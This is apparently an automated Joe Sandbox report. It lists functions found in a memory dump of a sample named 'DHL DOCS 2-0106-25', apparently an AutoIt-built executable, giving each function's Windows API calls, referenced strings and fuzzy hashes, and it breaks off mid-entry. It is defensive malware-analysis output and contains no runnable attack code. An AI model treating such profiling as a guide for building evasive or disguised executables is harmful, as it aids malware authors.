Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: aed0477364df773e0b7374b4b9a19751e25bfd642df45c37c82a214ed1df21cb
Instruction ID: 0933123b1f9cef95ae37ccdd59deb3e7e66fd4fb8f8e1122caad91ec6a038b27
Opcode Fuzzy Hash: aed0477364df773e0b7374b4b9a19751e25bfd642df45c37c82a214ed1df21cb
Instruction Fuzzy Hash: 8511CE71220209AFEB1A9F68EC44AFB376AEF15774F604324F964931E0C775DC619B60

Function 00244791 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002447EA

Strings

8], xrefs: 002447AE
0, xrefs: 002447D3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: InfoItemMenu
String ID: 0$8]
API String ID: 1619232296-1966601199
Opcode ID: 8a339222c7446d07c1db9360b8c457c84017a8f1156d24b7a8752825f6868899
Instruction ID: 6e861a433e7d63d12c60a35ec36143ebbe7674f050e845f57676a63e34531cb5
Opcode Fuzzy Hash: 8a339222c7446d07c1db9360b8c457c84017a8f1156d24b7a8752825f6868899
Instruction Fuzzy Hash: FE119A38961189EFDB29EF48DC40BE877B6BB0A304FA4804AEC915B251C731AD63DA54

Function 00244F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00244FCC

Strings

8], xrefs: 00244FA1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID: 8]
API String ID: 3850602802-438778366
Opcode ID: 7b964e9dd7a8595d45283ba30b2ba57b49d5517805d66b14cf3aaa174d5d1a0a
Instruction ID: 3c4c39f87d14d814eeabda077fe6b4f75ff03ffa3d5f0d9d214db5b05015a58d
Opcode Fuzzy Hash: 7b964e9dd7a8595d45283ba30b2ba57b49d5517805d66b14cf3aaa174d5d1a0a
Instruction Fuzzy Hash: 5121F67A62011AEFCB19DFA8D9449EA7BB9FB4D340B114154FD06A7310D731ED21DB90

Function 00216C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00216CB6
_wcslen.LIBCMT ref: 00216CC2

Strings

STOP, xrefs: 00216CBC, 00216CC1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 25ffe6a4c9b1b03e70745ecf59e6237fa303de38ce5de296fba0da3357df2b3b
Instruction ID: 9be594c1e7088cb78503a9e516b03dc449056c5b7067f1e489b572ad8cd7db6f
Opcode Fuzzy Hash: 25ffe6a4c9b1b03e70745ecf59e6237fa303de38ce5de296fba0da3357df2b3b
Instruction Fuzzy Hash: 4101C4326205278BCB209FFDEC889FF77E5EA757107500525E85296190EB31D9A0C690

Function 001C90DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

8], xrefs: 00207077, 0020709D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: 8]
API String ID: 0-438778366
Opcode ID: 46da2559d2639a1ef00aa9681b55be2f58e7a0455d99500111859a4383383902
Instruction ID: a45eb51a285416259b2320cd567e736d9c421900ff32ad9f491fa0e509e520c2
Opcode Fuzzy Hash: 46da2559d2639a1ef00aa9681b55be2f58e7a0455d99500111859a4383383902
Instruction Fuzzy Hash: 0B116D34610705AFCB24CF18D844EA577EAFB99320F148259F9258B2E1C771F951CF90

Function 00211CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 00213CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00213CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00211D4C

Strings

ListBox, xrefs: 00211D16
ComboBox, xrefs: 00211CEB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 41d2ade41b3e6b57a0f7b13d682e7574836a9f6eaff6804468d341399ddf4505
Instruction ID: f9d0746ea0ffbc0e591234d5d096b1053e54d1ab120eb630d9defff541569f9c
Opcode Fuzzy Hash: 41d2ade41b3e6b57a0f7b13d682e7574836a9f6eaff6804468d341399ddf4505
Instruction Fuzzy Hash: B9012831621218AB8B08EFA4DC51CFE77E8FF66350B10050AF922572C1EB705969C6A0

Function 00211BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 00213CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00213CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00211C46

Strings

ListBox, xrefs: 00211C10
ComboBox, xrefs: 00211BE5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: fa490b59da409631212fb54163355ca5d3b7dbbcdf30dd46fe2faf20e3640203
Instruction ID: 1b52fc4a543e04067d6dd6c6521938d8be05288ba82ed66475f7ff06aa430dae
Opcode Fuzzy Hash: fa490b59da409631212fb54163355ca5d3b7dbbcdf30dd46fe2faf20e3640203
Instruction Fuzzy Hash: 1201A7757A110967CB08EB90D9519FFB7E89F32340F14001AEA0667281EB709E7996F2

Function 00211C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Part of subcall function 00213CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00213CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00211CC8

Strings

ListBox, xrefs: 00211C94
ComboBox, xrefs: 00211C69

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 5ae794f9de7f3a6e82cdfcf51e4c8cd2831d372cc5bb4dafb7c754c794a2c97d
Instruction ID: 9c30a1d3cd8e1b28a12566f205ad6557dfbf76a9a0512fcbdb1b660060922140
Opcode Fuzzy Hash: 5ae794f9de7f3a6e82cdfcf51e4c8cd2831d372cc5bb4dafb7c754c794a2c97d
Instruction Fuzzy Hash: A701A77565111967CF04EB94CA41AFF77E89B32340B140016F90677281EB719F7996F2

Function 001CA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001CA529

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Strings

3y , xrefs: 001CA545, 001CA54D, 001CA552
,%(, xrefs: 001CA509

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%($3y
API String ID: 2551934079-4283432193
Opcode ID: 63b5bc2f8e7292f3af574ec6f0ec0e16df995d25133d8328f0477a1345a3136d
Instruction ID: 0a0812938b8dbd5612a8818dec43cb9c34f6ec32288ea684bbe3174b4ba9b3b6
Opcode Fuzzy Hash: 63b5bc2f8e7292f3af574ec6f0ec0e16df995d25133d8328f0477a1345a3136d
Instruction Fuzzy Hash: 5E01F73264161897C50AF768EC5BFAD3368DF25724F90401DFA01572C2DF50DD068A97

Function 002490A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0020769C,?,?,?), ref: 00249111

Part of subcall function 001C9944: GetWindowLongW.USER32(?,000000EB), ref: 001C9952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 002490F7

Strings

8], xrefs: 002490D6

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: 8]
API String ID: 982171247-438778366
Opcode ID: e2ea32a2c523749a4a0d2a39b0311ae92b916f124297706ece7cc88ffc560296
Instruction ID: 060622e7efde053d821344944796bab279c30fae0fcb63ac7f75e7819e6522ce
Opcode Fuzzy Hash: e2ea32a2c523749a4a0d2a39b0311ae92b916f124297706ece7cc88ffc560296
Instruction Fuzzy Hash: 9001D434112205BBDB299F14DC4EFA63BA6FF86365F100068F9591B2E1C772AC61CF50

Function 00248172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00283018,0028305C), ref: 002481BF
CloseHandle.KERNEL32 ref: 002481D1

Strings

\0(, xrefs: 0024818A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0(
API String ID: 3712363035-1880395983
Opcode ID: b782c8b4e2c6c627318ff791b58372631c65e82a638780f205cf3dc17a71097e
Instruction ID: 1ddd088edf47272c4b3633d07ca7125892ec8636e78d2f55c91860486be5ff5a
Opcode Fuzzy Hash: b782c8b4e2c6c627318ff791b58372631c65e82a638780f205cf3dc17a71097e
Instruction Fuzzy Hash: 79F054B9652300BAE320AB65BC49F773A5CEB15F54F004461FB08D51A1D6759A1093B5

Function 0023747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00237493
_wcslen.LIBCMT ref: 002374B9

Strings

3, 3, 16, 1, xrefs: 00237483

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: f98cd245714e4586d92bfd5cf06ec86d3c044867685a2580b468702b9990313f
Instruction ID: d128cb1e136ccefc27b72f7dffb3b4dc795a9cb6103b6a28dc287ff08c3175f3
Opcode Fuzzy Hash: f98cd245714e4586d92bfd5cf06ec86d3c044867685a2580b468702b9990313f
Instruction Fuzzy Hash: A4E0ABC6224321229234133A9CC197F4699CFDE350B10082BFA84C2366EBA49CB1C3A0

Function 00210B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00210B23

Strings

AutoIt, xrefs: 00210B17
Error allocating memory., xrefs: 00210B1C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 8747f88148d18a4bd4d430efd8ce233e0a939df2053ed162bc14647d1c0a2945
Instruction ID: 1fb6cafaa1ad03e7aaa4aad8b3027956c632c5c0f6de793dad35e7f0350217fd
Opcode Fuzzy Hash: 8747f88148d18a4bd4d430efd8ce233e0a939df2053ed162bc14647d1c0a2945
Instruction Fuzzy Hash: C8E0D83129531837D2143799BC43FC97B888F26B20F20442FF748555C38BE164A006E9

Function 001D0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001CF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001D0D71,?,?,?,001B100A), ref: 001CF7CE

IsDebuggerPresent.KERNEL32(?,?,?,001B100A), ref: 001D0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,001B100A), ref: 001D0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001D0D7F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: c66b4b3c7851bb218eb9fe36a297de7753135dc6b2e145143fe9a5d52c94f9ad
Instruction ID: 01154ba2413158e7ac9cb9f3a644794d598470c9e5a7e49c0edc268728c4e4ae
Opcode Fuzzy Hash: c66b4b3c7851bb218eb9fe36a297de7753135dc6b2e145143fe9a5d52c94f9ad
Instruction Fuzzy Hash: 41E06D742007018BD3A1DFBCE5087827BE6AB18741F00892EE886C6751DBF4E4448BA1

Function 001CE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001CE3D5

Strings

8%(, xrefs: 001CE3CA
0%(, xrefs: 001CE3B5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%($8%(
API String ID: 1385522511-1269923376
Opcode ID: a8ae189c5ad446aea039b3c7082e50b3164649b166a72afc16246ee5b46c98ac
Instruction ID: 3c72ebb03c3e15cecdd947367ccec0a9f4ab6553cb2eb1bb387e1fc66ac3a947
Opcode Fuzzy Hash: a8ae189c5ad446aea039b3c7082e50b3164649b166a72afc16246ee5b46c98ac
Instruction Fuzzy Hash: 59E020354A2950CBC60DA758B65DF4833D1FB3A320B94216DE001475D19B38B8458745

Function 00223017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0022302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00223044

Strings

aut, xrefs: 00223038

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 857b62b8f027c673d853ef79fae529f0bc9223780ebd0fe934626e32a8ee5a65
Instruction ID: 57dd727026c1e99c3fdf19810af352fd9aac1192b0334d3c600c5b099349fa21
Opcode Fuzzy Hash: 857b62b8f027c673d853ef79fae529f0bc9223780ebd0fe934626e32a8ee5a65
Instruction Fuzzy Hash: 2DD05E7650132867DB60E7A8AC0EFCB3A6CDB06750F0002A1BA55E2091DAF09984CAD4

Function 0020D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0020D220

Strings

%.3d, xrefs: 0020D22B
X64, xrefs: 0020D2A8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: dc2dd836c5533433e3dffb4b9664a5b0bf97ae191c0e99d27efa821645571c36
Instruction ID: c3a8246ddff8426f00d8fdaeecbe3cf87b4ff57f1154181441572c2c08c16e21
Opcode Fuzzy Hash: dc2dd836c5533433e3dffb4b9664a5b0bf97ae191c0e99d27efa821645571c36
Instruction Fuzzy Hash: 1DD0126582A318EECB9096D4DC49DBAB37CAB19301F608466FC0A91083D7B4D5286B61

Function 00242322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0024232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0024233F

Part of subcall function 0021E97B: Sleep.KERNEL32 ref: 0021E9F3

Strings

Shell_TrayWnd, xrefs: 00242325

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e363feeece95f1e7182143f57a5c239de56a0685ebe9803484d7d87acde155f4
Instruction ID: 1a429747ec781dcf9945cb32626ca5b818d35a598d7f2fcbcbedee680eb055ac
Opcode Fuzzy Hash: e363feeece95f1e7182143f57a5c239de56a0685ebe9803484d7d87acde155f4
Instruction Fuzzy Hash: 38D0227A3E1300B7E6ACB330EC0FFCABA189B01B00F118902770AAA0D0C8F0A800CE00

Function 00242356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0024236C
PostMessageW.USER32(00000000), ref: 00242373

Part of subcall function 0021E97B: Sleep.KERNEL32 ref: 0021E9F3

Strings

Shell_TrayWnd, xrefs: 00242365

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
